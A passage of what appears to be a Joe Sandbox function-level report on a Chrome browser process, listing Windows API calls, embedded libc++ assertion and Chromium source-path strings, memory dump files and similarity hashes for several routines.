                                                      • Part of subcall function 00D3C1E0: SetThreadPriority.KERNEL32(00000000,7FFFFFFF), ref: 00D3C21D
                                                      • Part of subcall function 00D3C1E0: GetCurrentThread.KERNEL32 ref: 00D3C23A
                                                      • Part of subcall function 00D3C1E0: SetThreadInformation.KERNEL32(00000000,00000003,?,0000000C), ref: 00D3C246
                                                    • GetCurrentThread.KERNEL32 ref: 00D52EFB
                                                    • GetThreadPriority.KERNEL32(00000000), ref: 00D52F02
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D52F48
                                                      • Part of subcall function 00D536C0: TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D536D6
                                                      • Part of subcall function 00D536C0: ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D537C6
                                                      • Part of subcall function 00E282C8: AcquireSRWLockExclusive.KERNEL32(00EF2800,000000C0,?,?,00DBFE69,00F02A10), ref: 00E282D3
                                                      • Part of subcall function 00E282C8: ReleaseSRWLockExclusive.KERNEL32(00EF2800,?,00DBFE69,00F02A10), ref: 00E2830D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Thread$Current$ExclusiveLock$AcquirePriorityRelease$ErrorLastProcess$DuplicateHandleInformation
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 2858082395-1090674830
                                                    • Opcode ID: 9f9aab18b4894f1488287df1b4e3b28c9398edde2bf11fc07e3ded258b87cf93
                                                    • Instruction ID: 96578d0640ee06505dcd72fcbbad1ff7183984cb86169401e25c81e93b2aa72c
                                                    • Opcode Fuzzy Hash: 9f9aab18b4894f1488287df1b4e3b28c9398edde2bf11fc07e3ded258b87cf93
                                                    • Instruction Fuzzy Hash: C591A471A002059FDB10AF75AC8AA7937A5EB85341F194129FD06773A1EB31BD0CCB72
                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 00DB1042
                                                    • SetLastError.KERNEL32(00000000), ref: 00DB104B
                                                    • SetLastError.KERNEL32(00000000), ref: 00DB105C
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DB1109
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DB1165
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00DB11FA
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DB1238
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00DB1250
                                                    • __floor_pentium4.LIBCMT ref: 00DB135C
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DB1450
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DB146F
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00DB148B
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DB1509
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DB1571
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\optional:795: assertion this->has_value() failed: optional operator* called on a disengaged value, xrefs: 00DB14C4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$ErrorLastUnothrow_t@std@@@__ehfuncinfo$??2@$Release$CounterPerformanceQuery__floor_pentium4
                                                    • String ID: ..\..\third_party\libc++\src\include\optional:795: assertion this->has_value() failed: optional operator* called on a disengaged value
                                                    • API String ID: 739387787-2004180939
                                                    • Opcode ID: b298fc17d6c25899542b9234bd078c91de56f01d68346930b9d75a5a05012c8f
                                                    • Instruction ID: ff1ec6a93d08ef24453714f41f883e0b25bce33576a537a48511c520a8ba1f21
                                                    • Opcode Fuzzy Hash: b298fc17d6c25899542b9234bd078c91de56f01d68346930b9d75a5a05012c8f
                                                    • Instruction Fuzzy Hash: 41F1A174604700DFC705DF29D8A566AB7E5FF85340F588A2DF88A9B261EB30D889CB52
                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 00DE03A6
                                                    • SetLastError.KERNEL32(00000000), ref: 00DE03B0
                                                    • SetLastError.KERNEL32(00000000), ref: 00DE03C1
                                                    • TryAcquireSRWLockExclusive.KERNEL32(0000055F), ref: 00DE046E
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DE04CA
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00DE055F
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DE059D
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00DE05B5
                                                    • __floor_pentium4.LIBCMT ref: 00DE06C1
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DE07B5
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DE07D4
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00DE07F0
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DE086E
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DE08D6
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\optional:795: assertion this->has_value() failed: optional operator* called on a disengaged value, xrefs: 00DE0829
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$ErrorLastUnothrow_t@std@@@__ehfuncinfo$??2@$Release$CounterPerformanceQuery__floor_pentium4
                                                    • String ID: ..\..\third_party\libc++\src\include\optional:795: assertion this->has_value() failed: optional operator* called on a disengaged value
                                                    • API String ID: 739387787-2004180939
                                                    • Opcode ID: c7d85f285bf70f2bb29d36199fb536aaa15108d8c95b7b7c13420b7f507427e7
                                                    • Instruction ID: a2789ea27d31e259fc8dfbbe36361b70eea4dccdf935c1e02f792a686a62585e
                                                    • Opcode Fuzzy Hash: c7d85f285bf70f2bb29d36199fb536aaa15108d8c95b7b7c13420b7f507427e7
                                                    • Instruction Fuzzy Hash: 04F1B4706043419FD705EF29D89472ABBE5FFC5340F188A2DF48A9B2A1EB74D885CB52
                                                    APIs
                                                    • GetLastError.KERNEL32(?,00D568F7,?,0000000C,?,00000000,?,?,00E72D92,?,00000001,?,?), ref: 00D5692E
                                                    • SetLastError.KERNEL32(00000000,?,00D568F7,?,0000000C,?,00000000,?,?,00E72D92,?,00000001,?,?), ref: 00D56938
                                                    • _strlen.LIBCMT ref: 00D56947
                                                    • GetLocalTime.KERNEL32(0000000C,?,?,?,?,?,00D568F7,?,0000000C,?,00000000,?,?,00E72D92,?,00000001), ref: 00D569AA
                                                    • _strlen.LIBCMT ref: 00D56AAF
                                                    • SetLastError.KERNEL32(?,?,?,00000001), ref: 00D56B8F
                                                    Strings
                                                    • )] , xrefs: 00D56AFE
                                                    • ..\..\third_party\libc++\src\include\string_view:422: assertion __n <= size() failed: remove_prefix() can't remove more than size(), xrefs: 00D56BCB
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D56BC4
                                                    • VERBOSE, xrefs: 00D56C58
                                                    • UNKNOWN, xrefs: 00D56BE8
                                                    • ..\..\third_party\libc++\src\include\string_view:330: assertion (__end - __begin) >= 0 failed: std::string_view::string_view(iterator, sentinel) received invalid range, xrefs: 00D56BD9
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00D56BD2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_strlen$LocalTime
                                                    • String ID: )] $..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:330: assertion (__end - __begin) >= 0 failed: std::string_view::string_view(iterator, sentinel) received invalid range$..\..\third_party\libc++\src\include\string_view:422: assertion __n <= size() failed: remove_prefix() can't remove more than size()$UNKNOWN$VERBOSE
                                                    • API String ID: 1138008395-693731270
                                                    • Opcode ID: 8593e3febf319d544e073c93295e04f5dfee7c7335fb4926bf998af743615561
                                                    • Instruction ID: b9881ccfefca9266ccd1787222b409f6b3fd2def064f9a4b11b4e74dbb1d933c
                                                    • Opcode Fuzzy Hash: 8593e3febf319d544e073c93295e04f5dfee7c7335fb4926bf998af743615561
                                                    • Instruction Fuzzy Hash: 28B1D1B4A002149FCF14AF64D88197EBBB5EF48305B484469EC45BB392EA75DC06CBA1
                                                    APIs
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,chrome.dll,0000000A,?,00000021,?,chrome.dll,0000000A,?,126.0.6478.183,0000000E,?,?,00000004), ref: 00D424E1
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008,no-pre-read-main-dll,?,?,00000004), ref: 00D42537
                                                    • SetProcessShutdownParameters.KERNEL32(0000027F,00000001,?,?,00000004), ref: 00D42561
                                                    • GetProcAddress.KERNEL32(?,ChromeMain), ref: 00D4258D
                                                      • Part of subcall function 00D428B0: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D42658), ref: 00D4292B
                                                      • Part of subcall function 00D428B0: PrefetchVirtualMemory.KERNEL32(00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00D42937
                                                    • GetInstallDetailsPayload.CHROME_ELF(00000004), ref: 00D42660
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CurrentProcess$AddressDetailsDirectoryInstallLibraryLoadMemoryParametersPayloadPrefetchProcShutdownVirtual
                                                    • String ID: ..\..\chrome\app\main_dll_loader_win.cc$126.0.6478.183$Cannot find module $ChromeMain$Failed to load Chrome DLL from $chrome.dll$no-pre-read-main-dll$type
                                                    • API String ID: 1824951502-3802372930
                                                    • Opcode ID: 360a1fcdd29136066f5b92a6cb9923ba8673fec6cb26bc048d80fe739711f6cf
                                                    • Instruction ID: 60f723f7a769e8cc7d90006f938e4db4dbed1beb2c9e82b4bb2db10fbb3eded0
                                                    • Opcode Fuzzy Hash: 360a1fcdd29136066f5b92a6cb9923ba8673fec6cb26bc048d80fe739711f6cf
                                                    • Instruction Fuzzy Hash: C5B1A470E002599BEB20DF64DC45BBEB7B5EF55300F4485AAF409B7281EB709A89CB61
                                                    APIs
                                                    • GetFileVersionInfoSizeW.VERSION(?,00000000,0.0.0.0-devel,0000000D,Chrome,00000006,?,00E578B9,?), ref: 00D74BF2
                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,00000006,?,00E578B9,?), ref: 00D74C1B
                                                      • Part of subcall function 00D74F20: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?), ref: 00D74F82
                                                      • Part of subcall function 00D74F20: GetUserDefaultLangID.KERNEL32(00000000,\VarFileInfo\Translation,?,?), ref: 00D74FAE
                                                      • Part of subcall function 00D74F20: GetUserDefaultLangID.KERNEL32 ref: 00D74FB7
                                                      • Part of subcall function 00D74F20: VerQueryValueW.VERSION(?,?,?,?), ref: 00D75023
                                                    Strings
                                                    • ProductShortName, xrefs: 00D74D72
                                                    • ProductVersion, xrefs: 00D74C46
                                                    • Official Build, xrefs: 00D74CC8
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D74EA5
                                                    • Chrome, xrefs: 00D74BB1
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D74EAC
                                                    • SpecialBuild, xrefs: 00D74DE5
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D74E9E
                                                    • extended, xrefs: 00D74EF5
                                                    • -devel, xrefs: 00D74EC0
                                                    • 0.0.0.0-devel, xrefs: 00D74BBF
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: DefaultFileInfoLangQueryUserValueVersion$Size
                                                    • String ID: -devel$..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$0.0.0.0-devel$Chrome$Official Build$ProductShortName$ProductVersion$SpecialBuild$extended
                                                    • API String ID: 4255889946-2556447703
                                                    • Opcode ID: 0c24535357dcf08b73dbd16081916a52bcb5caf5440513a6823f5ef38021720a
                                                    • Instruction ID: da5416314289f73ce08a521b913804fbc81f0eeacdb7b085cd1e54693401298d
                                                    • Opcode Fuzzy Hash: 0c24535357dcf08b73dbd16081916a52bcb5caf5440513a6823f5ef38021720a
                                                    • Instruction Fuzzy Hash: ED9106B0D002558BEF02DF54D802BAEB7B1FF58314F19D11AE8497B2A6F771A984C762
                                                    APIs
                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D45955
                                                    • OpenProcess.KERNEL32(00000451,00000001,00000000), ref: 00D45963
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D45970
                                                    • SetLastError.KERNEL32(00000000), ref: 00D45996
                                                    • UpdateProcThreadAttribute.KERNEL32(?,00000000,00020002,?,00000004,00000000,00000000,00000001), ref: 00D459E0
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D45CF6
                                                    • --thread=, xrefs: 00D45B04
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D45CEF
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00D45C92
                                                    • exception-pointers, xrefs: 00D45A85
                                                    • database, xrefs: 00D45A3F
                                                    • process, xrefs: 00D45AD8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastProcess$AttributeCurrentOpenProcThreadUpdate
                                                    • String ID: --thread=$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$database$exception-pointers$process
                                                    • API String ID: 3486958663-843892808
                                                    • Opcode ID: 9e6f0c45333ea91d621aab7cfb4b504ef8c723a036c856e3e331d738d430da44
                                                    • Instruction ID: 0f97633605950cbb53e2626c4887b4e99c8555e2de6e211524ec2155e151f0a1
                                                    • Opcode Fuzzy Hash: 9e6f0c45333ea91d621aab7cfb4b504ef8c723a036c856e3e331d738d430da44
                                                    • Instruction Fuzzy Hash: ABC1B271E00B589FCB10DFA4E8C1AAEBBB5FF44714F180519E842BB35AE770A945CB61
                                                    APIs
                                                    • CreateFileW.KERNEL32 ref: 00D493FB
                                                    • SetNamedPipeHandleState.KERNEL32(00000000,?,00000000,00000000), ref: 00D49416
                                                    • TransactNamedPipe.KERNEL32(00000000,?,00000024,00D48ED1,0000000C,?,00000000), ref: 00D49439
                                                    • GetLastError.KERNEL32 ref: 00D4947D
                                                    • WaitNamedPipeW.KERNEL32(?,000000FF), ref: 00D49497
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: NamedPipe$CreateErrorFileHandleLastStateTransactWait
                                                    • String ID: , observed $..\..\third_party\crashpad\crashpad\util\win\registration_protocol_win.cc$CreateFile$SetNamedPipeHandleState$TransactNamedPipe$TransactNamedPipe: expected $WaitNamedPipe
                                                    • API String ID: 3582518244-2365249698
                                                    • Opcode ID: 85231c7fd667035a637541fca603e5005d05da96db956dab31eb34036eb9b8a6
                                                    • Instruction ID: 29d09cb9e4437630c55418b6fc4b2f3798ad01c5b47572dc4caca5137aa9bbab
                                                    • Opcode Fuzzy Hash: 85231c7fd667035a637541fca603e5005d05da96db956dab31eb34036eb9b8a6
                                                    • Instruction Fuzzy Hash: 0451E7B0700344ABEF20AB669C56FAF77A9EB85700F084565F50D762C1DB705D49CB62
                                                    APIs
                                                    • LocalFree.KERNEL32(?), ref: 00D6477B
                                                    • CreateFileW.KERNEL32 ref: 00D64841
                                                    • GetLastError.KERNEL32 ref: 00D64851
                                                    • SetLastError.KERNEL32(00000000), ref: 00D64868
                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,00000004,00000004), ref: 00D64987
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D64993
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$AddressCreateFileFreeHandleLocalModuleProc
                                                    • String ID: ..\..\base\win\security_util.cc$AddACEToPath$GetHandleVerifier$ScopedBlockingCall
                                                    • API String ID: 24226920-314747623
                                                    • Opcode ID: f65b33c9fb115c39214a069f94c8714e3394407f921422fa6b035d1698ce5129
                                                    • Instruction ID: c34f7d2aef5d27b4c338b1af8881ee556df744d8d855c30c003238218225b1cb
                                                    • Opcode Fuzzy Hash: f65b33c9fb115c39214a069f94c8714e3394407f921422fa6b035d1698ce5129
                                                    • Instruction Fuzzy Hash: ABB10771A043819FD710EF64D88576BB7E4EF99300F18492EF9C5A7251EB70E948CBA2
                                                    APIs
                                                    • __aullrem.LIBCMT ref: 00D83B5B
                                                    • __aullrem.LIBCMT ref: 00D83B8F
                                                    • LoadLibraryW.KERNEL32(bcryptprimitives.dll,?,?,?,?,?,?,?,00E7165C,?,?,00000000), ref: 00D83BCD
                                                    • GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 00D83BDD
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,-00000001,?,?,?,?,?,?,?,?,?,00E7165C,?,?,00000000), ref: 00D83C1F
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,00E7165C,?,?,00000000), ref: 00D83C33
                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,00E7165C,?,?,00000000), ref: 00D83C41
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D83ACA
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D83AC3
                                                    • bcryptprimitives.dll, xrefs: 00D83BC8
                                                    • ProcessPrng, xrefs: 00D83BD7
                                                    Memory Dump Source
